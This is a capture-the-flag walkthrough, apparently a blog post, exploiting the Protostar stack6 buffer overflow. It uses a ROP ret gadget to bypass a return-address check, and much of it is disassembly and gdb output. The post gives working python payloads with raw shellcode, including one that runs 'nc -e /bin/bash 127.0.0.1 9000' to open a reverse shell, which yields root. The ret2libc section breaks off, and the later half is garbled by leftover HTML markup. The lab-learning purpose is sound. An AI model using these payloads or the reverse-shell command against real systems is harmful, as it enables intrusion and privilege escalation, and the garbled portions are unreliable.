The buffer overflow is on line 13, the application then gets the function return address on line 15 and checks it on line 17.

If the return address begins with bf the application exits, stack addresses normally begin with bf so you cannot just overwrite it with an address on the stack.

One other thing to notice here is that the vulnerable line is using the gets function, this function will only stop once it reaches a newline (\n) or end of file (EOF) character so we do not need to avoid null (\0) characters.

Stack6: The Easy Way

While I've written this post to demonstrate Ret2Libc and ROP we can get our shellcode to run on these 2 challenges using the exact same method which I'll explain quickly here.

So our buffer is 64 bytes long, we have the local variable ret which is 4 bytes, then we have the saved EBP from main's stack frame and finally the return address, its worth noting that the stack has to be 16 byte aligned so 8 will need to be added before you get to the return address. So we need to write 64+4+4+8 = 80 bytes before we overwrite the return address and hijack EIP.

Lets test this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ bash
[email protected]:~$ cd /opt/protostar/bin/
[email protected]:/opt/protostar/bin$ python -c 'print "A"*80' > /tmp/t
[email protected]:/opt/protostar/bin$ python -c 'print "A"*84' > /tmp/t2
[email protected]:/opt/protostar/bin$ gdb -q ./stack6
Reading symbols from /opt/protostar/bin/stack6...done.
(gdb) r < /tmp/t
Starting program: /opt/protostar/bin/stack6 < /tmp/t
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�AAAAAAAAAAAA� �

Program received signal SIGSEGV, Segmentation fault.
0x08048507 in main (argc=Cannot access memory at address 0x41414149
) at stack6/stack6.c:31
31  stack6/stack6.c: No such file or directory.
    in stack6/stack6.c
(gdb) r < /tmp/t2
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack6 < /tmp/t2
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

So we were correct, we can now test what happens if we write an address beginning with bf:

1
2
[email protected]:/opt/protostar/bin$ python -c 'print "A"*80 + "\x00\x00\x00\xbf"' | ./stack6
input path please: bzzzt (0xbf000000)

As you can see we've hit the printf inside the if statement and exited without seg faulting.

If there was a jmp esp or ff e4 in the application code we could use the same method we used in the beating ASLR post but that isn't the case here.

We can still run our shellcode though using a slightly more complex method, the application is only checking the return address of the current function (note the argument to the __builtin_return_address function call), so we just need to make sure that this address doesn't start with bf.

We'll do this by using 1 ROP "gadget", let's first find the address of our gadget:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
[email protected]:/opt/protostar/bin$ objdump -d ./stack6 -M intel

./stack6:     file format elf32-i386


Disassembly of section .init:

08048330 <_init>:
 8048330:   55                      push   ebp
 8048331:   89 e5                   mov    ebp,esp
 8048333:   53                      push   ebx
 8048334:   83 ec 04                sub    esp,0x4
 8048337:   e8 00 00 00 00          call   804833c <_init+0xc>
 804833c:   5b                      pop    ebx
 804833d:   81 c3 b0 13 00 00       add    ebx,0x13b0
 8048343:   8b 93 fc ff ff ff       mov    edx,DWORD PTR [ebx-0x4]
 8048349:   85 d2                   test   edx,edx
 804834b:   74 05                   je     8048352 <_init+0x22>
 804834d:   e8 1e 00 00 00          call   8048370 <[email protected]>
 8048352:   e8 09 01 00 00          call   8048460 <frame_dummy>
 8048357:   e8 24 02 00 00          call   8048580 <__do_global_ctors_aux>
 804835c:   58                      pop    eax
 804835d:   5b                      pop    ebx
 804835e:   c9                      leave  
 804835f:   c3                      ret    

Disassembly of section .plt:

08048360 <[email protected]-0x10>:
 8048360:   ff 35 f0 96 04 08       push   DWORD PTR ds:0x80496f0
 8048366:   ff 25 f4 96 04 08       jmp    DWORD PTR ds:0x80496f4
 804836c:   00 00                   add    BYTE PTR [eax],al
    ...

08048370 <[email protected]>:
 8048370:   ff 25 f8 96 04 08       jmp    DWORD PTR ds:0x80496f8
 8048376:   68 00 00 00 00          push   0x0
 804837b:   e9 e0 ff ff ff          jmp    8048360 <_init+0x30>

08048380 <[email protected]>:
 8048380:   ff 25 fc 96 04 08       jmp    DWORD PTR ds:0x80496fc
 8048386:   68 08 00 00 00          push   0x8
 804838b:   e9 d0 ff ff ff          jmp    8048360 <_init+0x30>

08048390 <[email protected]>:
 8048390:   ff 25 00 97 04 08       jmp    DWORD PTR ds:0x8049700
 8048396:   68 10 00 00 00          push   0x10
 804839b:   e9 c0 ff ff ff          jmp    8048360 <_init+0x30>

080483a0 <[email protected]>:
 80483a0:   ff 25 04 97 04 08       jmp    DWORD PTR ds:0x8049704
 80483a6:   68 18 00 00 00          push   0x18
 80483ab:   e9 b0 ff ff ff          jmp    8048360 <_init+0x30>

080483b0 <[email protected]>:
 80483b0:   ff 25 08 97 04 08       jmp    DWORD PTR ds:0x8049708
 80483b6:   68 20 00 00 00          push   0x20
 80483bb:   e9 a0 ff ff ff          jmp    8048360 <_init+0x30>

080483c0 <[email protected]>:
 80483c0:   ff 25 0c 97 04 08       jmp    DWORD PTR ds:0x804970c
 80483c6:   68 28 00 00 00          push   0x28
 80483cb:   e9 90 ff ff ff          jmp    8048360 <_init+0x30>

Disassembly of section .text:

080483d0 <_start>:
 80483d0:   31 ed                   xor    ebp,ebp
 80483d2:   5e                      pop    esi
 80483d3:   89 e1                   mov    ecx,esp
 80483d5:   83 e4 f0                and    esp,0xfffffff0
 80483d8:   50                      push   eax
 80483d9:   54                      push   esp
 80483da:   52                      push   edx
 80483db:   68 10 85 04 08          push   0x8048510
 80483e0:   68 20 85 04 08          push   0x8048520
 80483e5:   51                      push   ecx
 80483e6:   56                      push   esi
 80483e7:   68 fa 84 04 08          push   0x80484fa
 80483ec:   e8 9f ff ff ff          call   8048390 <[email protected]>
 80483f1:   f4                      hlt    
 80483f2:   90                      nop
 80483f3:   90                      nop
 80483f4:   90                      nop
 80483f5:   90                      nop
 80483f6:   90                      nop
 80483f7:   90                      nop
 80483f8:   90                      nop
 80483f9:   90                      nop
 80483fa:   90                      nop
 80483fb:   90                      nop
 80483fc:   90                      nop
 80483fd:   90                      nop
 80483fe:   90                      nop
 80483ff:   90                      nop

08048400 <__do_global_dtors_aux>:
 8048400:   55                      push   ebp
 8048401:   89 e5                   mov    ebp,esp
 8048403:   53                      push   ebx
 8048404:   83 ec 04                sub    esp,0x4
 8048407:   80 3d 24 97 04 08 00    cmp    BYTE PTR ds:0x8049724,0x0
 804840e:   75 3f                   jne    804844f <__do_global_dtors_aux+0x4f>
 8048410:   a1 28 97 04 08          mov    eax,ds:0x8049728
 8048415:   bb 10 96 04 08          mov    ebx,0x8049610
 804841a:   81 eb 0c 96 04 08       sub    ebx,0x804960c
 8048420:   c1 fb 02                sar    ebx,0x2
 8048423:   83 eb 01                sub    ebx,0x1
 8048426:   39 d8                   cmp    eax,ebx
 8048428:   73 1e                   jae    8048448 <__do_global_dtors_aux+0x48>
 804842a:   8d b6 00 00 00 00       lea    esi,[esi+0x0]
 8048430:   83 c0 01                add    eax,0x1
 8048433:   a3 28 97 04 08          mov    ds:0x8049728,eax
 8048438:   ff 14 85 0c 96 04 08    call   DWORD PTR [eax*4+0x804960c]
 804843f:   a1 28 97 04 08          mov    eax,ds:0x8049728
 8048444:   39 d8                   cmp    eax,ebx
 8048446:   72 e8                   jb     8048430 <__do_global_dtors_aux+0x30>
 8048448:   c6 05 24 97 04 08 01    mov    BYTE PTR ds:0x8049724,0x1
 804844f:   83 c4 04                add    esp,0x4
 8048452:   5b                      pop    ebx
 8048453:   5d                      pop    ebp
 8048454:   c3                      ret    
 8048455:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048459:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]

08048460 <frame_dummy>:
 8048460:   55                      push   ebp
 8048461:   89 e5                   mov    ebp,esp
 8048463:   83 ec 18                sub    esp,0x18
 8048466:   a1 14 96 04 08          mov    eax,ds:0x8049614
 804846b:   85 c0                   test   eax,eax
 804846d:   74 12                   je     8048481 <frame_dummy+0x21>
 804846f:   b8 00 00 00 00          mov    eax,0x0
 8048474:   85 c0                   test   eax,eax
 8048476:   74 09                   je     8048481 <frame_dummy+0x21>
 8048478:   c7 04 24 14 96 04 08    mov    DWORD PTR [esp],0x8049614
 804847f:   ff d0                   call   eax
 8048481:   c9                      leave  
 8048482:   c3                      ret    
 8048483:   90                      nop

08048484 <getpath>:
 8048484:   55                      push   ebp
 8048485:   89 e5                   mov    ebp,esp
 8048487:   83 ec 68                sub    esp,0x68
 804848a:   b8 d0 85 04 08          mov    eax,0x80485d0
 804848f:   89 04 24                mov    DWORD PTR [esp],eax
 8048492:   e8 29 ff ff ff          call   80483c0 <[email protected]>
 8048497:   a1 20 97 04 08          mov    eax,ds:0x8049720
 804849c:   89 04 24                mov    DWORD PTR [esp],eax
 804849f:   e8 0c ff ff ff          call   80483b0 <[email protected]>
 80484a4:   8d 45 b4                lea    eax,[ebp-0x4c]
 80484a7:   89 04 24                mov    DWORD PTR [esp],eax
 80484aa:   e8 d1 fe ff ff          call   8048380 <[email protected]>
 80484af:   8b 45 04                mov    eax,DWORD PTR [ebp+0x4]
 80484b2:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 80484b5:   8b 45 f4                mov    eax,DWORD PTR [ebp-0xc]
 80484b8:   25 00 00 00 bf          and    eax,0xbf000000
 80484bd:   3d 00 00 00 bf          cmp    eax,0xbf000000
 80484c2:   75 20                   jne    80484e4 <getpath+0x60>
 80484c4:   b8 e4 85 04 08          mov    eax,0x80485e4
 80484c9:   8b 55 f4                mov    edx,DWORD PTR [ebp-0xc]
 80484cc:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx
 80484d0:   89 04 24                mov    DWORD PTR [esp],eax
 80484d3:   e8 e8 fe ff ff          call   80483c0 <[email protected]>
 80484d8:   c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1
 80484df:   e8 bc fe ff ff          call   80483a0 <[email protected]>
 80484e4:   b8 f0 85 04 08          mov    eax,0x80485f0
 80484e9:   8d 55 b4                lea    edx,[ebp-0x4c]
 80484ec:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx
 80484f0:   89 04 24                mov    DWORD PTR [esp],eax
 80484f3:   e8 c8 fe ff ff          call   80483c0 <[email protected]>
 80484f8:   c9                      leave  
 80484f9:   c3                      ret    

080484fa <main>:
 80484fa:   55                      push   ebp
 80484fb:   89 e5                   mov    ebp,esp
 80484fd:   83 e4 f0                and    esp,0xfffffff0
 8048500:   e8 7f ff ff ff          call   8048484 <getpath>
 8048505:   89 ec                   mov    esp,ebp
 8048507:   5d                      pop    ebp
 8048508:   c3                      ret    
 8048509:   90                      nop
 804850a:   90                      nop
 804850b:   90                      nop
 804850c:   90                      nop
 804850d:   90                      nop
 804850e:   90                      nop
 804850f:   90                      nop

08048510 <__libc_csu_fini>:
 8048510:   55                      push   ebp
 8048511:   89 e5                   mov    ebp,esp
 8048513:   5d                      pop    ebp
 8048514:   c3                      ret    
 8048515:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048519:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]

08048520 <__libc_csu_init>:
 8048520:   55                      push   ebp
 8048521:   89 e5                   mov    ebp,esp
 8048523:   57                      push   edi
 8048524:   56                      push   esi
 8048525:   53                      push   ebx
 8048526:   e8 4f 00 00 00          call   804857a <__i686.get_pc_thunk.bx>
 804852b:   81 c3 c1 11 00 00       add    ebx,0x11c1
 8048531:   83 ec 1c                sub    esp,0x1c
 8048534:   e8 f7 fd ff ff          call   8048330 <_init>
 8048539:   8d bb 18 ff ff ff       lea    edi,[ebx-0xe8]
 804853f:   8d 83 18 ff ff ff       lea    eax,[ebx-0xe8]
 8048545:   29 c7                   sub    edi,eax
 8048547:   c1 ff 02                sar    edi,0x2
 804854a:   85 ff                   test   edi,edi
 804854c:   74 24                   je     8048572 <__libc_csu_init+0x52>
 804854e:   31 f6                   xor    esi,esi
 8048550:   8b 45 10                mov    eax,DWORD PTR [ebp+0x10]
 8048553:   89 44 24 08             mov    DWORD PTR [esp+0x8],eax
 8048557:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
 804855a:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax
 804855e:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 8048561:   89 04 24                mov    DWORD PTR [esp],eax
 8048564:   ff 94 b3 18 ff ff ff    call   DWORD PTR [ebx+esi*4-0xe8]
 804856b:   83 c6 01                add    esi,0x1
 804856e:   39 fe                   cmp    esi,edi
 8048570:   72 de                   jb     8048550 <__libc_csu_init+0x30>
 8048572:   83 c4 1c                add    esp,0x1c
 8048575:   5b                      pop    ebx
 8048576:   5e                      pop    esi
 8048577:   5f                      pop    edi
 8048578:   5d                      pop    ebp
 8048579:   c3                      ret    

0804857a <__i686.get_pc_thunk.bx>:
 804857a:   8b 1c 24                mov    ebx,DWORD PTR [esp]
 804857d:   c3                      ret    
 804857e:   90                      nop
 804857f:   90                      nop

08048580 <__do_global_ctors_aux>:
 8048580:   55                      push   ebp
 8048581:   89 e5                   mov    ebp,esp
 8048583:   53                      push   ebx
 8048584:   83 ec 04                sub    esp,0x4
 8048587:   a1 04 96 04 08          mov    eax,ds:0x8049604
 804858c:   83 f8 ff                cmp    eax,0xffffffff
 804858f:   74 13                   je     80485a4 <__do_global_ctors_aux+0x24>
 8048591:   bb 04 96 04 08          mov    ebx,0x8049604
 8048596:   66 90                   xchg   ax,ax
 8048598:   83 eb 04                sub    ebx,0x4
 804859b:   ff d0                   call   eax
 804859d:   8b 03                   mov    eax,DWORD PTR [ebx]
 804859f:   83 f8 ff                cmp    eax,0xffffffff
 80485a2:   75 f4                   jne    8048598 <__do_global_ctors_aux+0x18>
 80485a4:   83 c4 04                add    esp,0x4
 80485a7:   5b                      pop    ebx
 80485a8:   5d                      pop    ebp
 80485a9:   c3                      ret    
 80485aa:   90                      nop
 80485ab:   90                      nop

Disassembly of section .fini:

080485ac <_fini>:
 80485ac:   55                      push   ebp
 80485ad:   89 e5                   mov    ebp,esp
 80485af:   53                      push   ebx
 80485b0:   83 ec 04                sub    esp,0x4
 80485b3:   e8 00 00 00 00          call   80485b8 <_fini+0xc>
 80485b8:   5b                      pop    ebx
 80485b9:   81 c3 34 11 00 00       add    ebx,0x1134
 80485bf:   e8 3c fe ff ff          call   8048400 <__do_global_dtors_aux>
 80485c4:   59                      pop    ecx
 80485c5:   5b                      pop    ebx
 80485c6:   c9                      leave  
 80485c7:   c3                      ret

All we're looking for here is a ret instruction, there are a few, we'll use the 1 on line 258, the address of this is 80485a9 so this will be our return address.

After the return address we insert some junk data (4 bytes) and then we will put the address of our shellcode.

First let's find the address that our shellcode will be at, this needs to be done in 2 terminals:

1
2
[email protected]:/opt/protostar/bin$ ./stack6
input path please:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
[email protected]:/# ps ax | grep stack6
 2221 pts/0    S+     0:00 ./stack6
 2268 pts/1    S+     0:00 grep stack6
[email protected]:/# gdb -q -p 2221
Attaching to process 2221
Reading symbols from /opt/protostar/bin/stack6...done.
Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7f53c1e in __read_nocancel () at ../sysdeps/unix/syscall-template.S:82
82  ../sysdeps/unix/syscall-template.S: No such file or directory.
    in ../sysdeps/unix/syscall-template.S
(gdb) set disassembly-flavor intel
Current language:  auto
The current source language is "auto; currently asm".
(gdb) disassemble getpath
Dump of assembler code for function getpath:
0x08048484 <getpath+0>: push   ebp
0x08048485 <getpath+1>: mov    ebp,esp
0x08048487 <getpath+3>: sub    esp,0x68
0x0804848a <getpath+6>: mov    eax,0x80485d0
0x0804848f <getpath+11>:    mov    DWORD PTR [esp],eax
0x08048492 <getpath+14>:    call   0x80483c0 <[email protected]>
0x08048497 <getpath+19>:    mov    eax,ds:0x8049720
0x0804849c <getpath+24>:    mov    DWORD PTR [esp],eax
0x0804849f <getpath+27>:    call   0x80483b0 <[email protected]>
0x080484a4 <getpath+32>:    lea    eax,[ebp-0x4c]
0x080484a7 <getpath+35>:    mov    DWORD PTR [esp],eax
0x080484aa <getpath+38>:    call   0x8048380 <[email protected]>
0x080484af <getpath+43>:    mov    eax,DWORD PTR [ebp+0x4]
0x080484b2 <getpath+46>:    mov    DWORD PTR [ebp-0xc],eax
0x080484b5 <getpath+49>:    mov    eax,DWORD PTR [ebp-0xc]
0x080484b8 <getpath+52>:    and    eax,0xbf000000
0x080484bd <getpath+57>:    cmp    eax,0xbf000000
0x080484c2 <getpath+62>:    jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>:    mov    eax,0x80485e4
0x080484c9 <getpath+69>:    mov    edx,DWORD PTR [ebp-0xc]
0x080484cc <getpath+72>:    mov    DWORD PTR [esp+0x4],edx
0x080484d0 <getpath+76>:    mov    DWORD PTR [esp],eax
0x080484d3 <getpath+79>:    call   0x80483c0 <[email protected]>
0x080484d8 <getpath+84>:    mov    DWORD PTR [esp],0x1
0x080484df <getpath+91>:    call   0x80483a0 <[email protected]>
0x080484e4 <getpath+96>:    mov    eax,0x80485f0
0x080484e9 <getpath+101>:   lea    edx,[ebp-0x4c]
0x080484ec <getpath+104>:   mov    DWORD PTR [esp+0x4],edx
0x080484f0 <getpath+108>:   mov    DWORD PTR [esp],eax
0x080484f3 <getpath+111>:   call   0x80483c0 <[email protected]>
0x080484f8 <getpath+116>:   leave  
0x080484f9 <getpath+117>:   ret    
End of assembler dump.
(gdb) break *0x080484af
Breakpoint 1 at 0x80484af: file stack6/stack6.c, line 15.
(gdb) c
Continuing.
1
AAAAAAAAAAAA
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
Breakpoint 1, getpath () at stack6/stack6.c:15
15  stack6/stack6.c: No such file or directory.
    in stack6/stack6.c
Current language:  auto
The current source language is "auto; currently c".
(gdb) x/20xw $esp
0xbffff770: 0xbffff78c  0x00000000  0xb7fe1b28  0x00000001
0xbffff780: 0x00000000  0x00000001  0xb7fff8f8  0x41414141
0xbffff790: 0x41414141  0x41414141  0xbffff700  0xb7eada75
0xbffff7a0: 0xb7fd7ff4  0x080496ec  0xbffff7b8  0x0804835c
0xbffff7b0: 0xb7ff1040  0x080496ec  0xbffff7e8  0x08048539

This means our payload will start at 0xbffff780+0xc = 0xbffff78c.

For this challenge I will put the shellcode at the end of the payload, we know the starting address of our payload and how many bytes until the shellcode so our shellcode will be at 0xbffff78c+0x58 = 0xbffff7e4.

I first tried with a normal shellcode that I had written but it didn't work:

1
2
3
4
5
[email protected]:/opt/protostar/bin$ python -c 'print "A"*80 + "\xa9\x85\x04\x08" + "\xe4\xf7\xff\xbf" + "\xeb\x25\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x1c\x13\x31\xc9\x89\x4b\x0e\x8d\x0c\x13\x8d\x53\x0e\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"' | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA�������%1�̀��[�C  �
                                                                                                                                 1Ҳ B�1ɉK�/span/span
span class="code-line"span class="go"       �S̀�����/bin/bashABBBBCCCC/span/span
span class="code-line"span class="gp"[email protected]:/opt/protostar/bin$/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo it launched... Don't know what happened here, after some investigation I decided that it did actually run code/bin/bash/code but exited straight away./p
pAfter some thinking I decide that I'm going to get codeexecve/code to run codebash/code and that to run codenc/code to execute a shell, there are plenty of ways to get a shell in this situation, creating a script and running that, running codenc/code directly..., this was just the first 1 that come to mind for me./p
pcodenc/code or a href="http://netcat.sourceforge.net/" target="_blank"netcat/a is a handy networking tool that can be used for a number of things, here we will use it to execute a shell./p
pSo I rewrote the shellcode, started codenc/code listening on port 9000 in 1 terminal:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
pAnd then launched the exploit with the new shellcode:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/span
span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xa9\x85\x04\x08quot; + quot;\xe4\xf7\xff\xbfquot; + quot;\xeb\x37\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\x88\x43\x0c\x88\x43\x2b\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x5b\x2c\x8d\x0c\x13\x89\x4b\x30\x8d\x4b\x0d\x89\x4b\x34\x31\xc9\x89\x4b\x38\x8d\x4b\x2c\x8d\x53\x34\xcd\x80\xe8\xc4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x2d\x63\x42\x6e\x63\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x20\x39\x30\x30\x30\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47quot;#39;/span span class="p"|/span ./stack6/span
span class="code-line"span class="go"input path please: got path 1�̀��[�C    �C/span/span
span class="code-line"span class="go"                                                                                                                                  �C+�/span/span
span class="code-line"span class="go"                                                                                                                                      1ҲB�[,�/span/span
span class="code-line"span class="go"�K41ɉK8�K,�S4̀�����/bin/bashA-cBnc -e /bin/bash 127.0.0.1 9000CDDDDEEEEFFFFGGGG/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/span
span class="code-line"span class="normal"26/span/span
span class="code-line"span class="normal"27/span/span
span class="code-line"span class="normal"28/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"ls/span/span
span class="code-line"span class="go"final0/span/span
span class="code-line"span class="go"final1/span/span
span class="code-line"span class="go"final2/span/span
span class="code-line"span class="go"format0/span/span
span class="code-line"span class="go"format1/span/span
span class="code-line"span class="go"format2/span/span
span class="code-line"span class="go"format3/span/span
span class="code-line"span class="go"format4/span/span
span class="code-line"span class="go"heap0/span/span
span class="code-line"span class="go"heap1/span/span
span class="code-line"span class="go"heap2/span/span
span class="code-line"span class="go"heap3/span/span
span class="code-line"span class="go"net0/span/span
span class="code-line"span class="go"net1/span/span
span class="code-line"span class="go"net2/span/span
span class="code-line"span class="go"net3/span/span
span class="code-line"span class="go"net4/span/span
span class="code-line"span class="go"stack0/span/span
span class="code-line"span class="go"stack1/span/span
span class="code-line"span class="go"stack2/span/span
span class="code-line"span class="go"stack3/span/span
span class="code-line"span class="go"stack4/span/span
span class="code-line"span class="go"stack5/span/span
span class="code-line"span class="go"stack6/span/span
span class="code-line"span class="go"stack7/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo, we can still run our shellcode, we just have an extra step to bypass the check that is done on the return address./p
h2Stack6: Ret2Libc and ROP/h2
pHere we will recreate the exact same exploit for the same application but without using any shellcode./p
pFirst its easiest if we create what we want to run in C first:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"setuid/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="n"execve/spanspan class="p"(/spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="p"{/spanspan class="w" /spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;-cquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;nc -e /bin/bash 127.0.0.1 9000quot;/spanspan class="w" /spanspan class="p"},/spanspan class="w" /spanspan class="nb"NULL/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo we need to find the addresses of both codesetuid/code and codeexecve/code, we use codegdb/code for this:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spangdb -q ./stack6/span
span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack6...done./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span
span class="code-line"span class="go"Dump of assembler code for function main:/span/span
span class="code-line"span class="go"0x080484fa lt;main+0gt;:    push   %ebp/span/span
span class="code-line"span class="go"0x080484fb lt;main+1gt;:    mov    %esp,%ebp/span/span
span class="code-line"span class="go"0x080484fd lt;main+3gt;:    and    $0xfffffff0,%esp/span/span
span class="code-line"span class="go"0x08048500 lt;main+6gt;:    call   0x8048484 lt;getpathgt;/span/span
span class="code-line"span class="go"0x08048505 lt;main+11gt;:   mov    %ebp,%esp/span/span
span class="code-line"span class="go"0x08048507 lt;main+13gt;:   pop    %ebp/span/span
span class="code-line"span class="go"0x08048508 lt;main+14gt;:   ret    /span/span
span class="code-line"span class="go"End of assembler dump./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x080484fa/span/span
span class="code-line"span class="go"Breakpoint 1 at 0x80484fa: file stack6/stack6.c, line 26./span/span
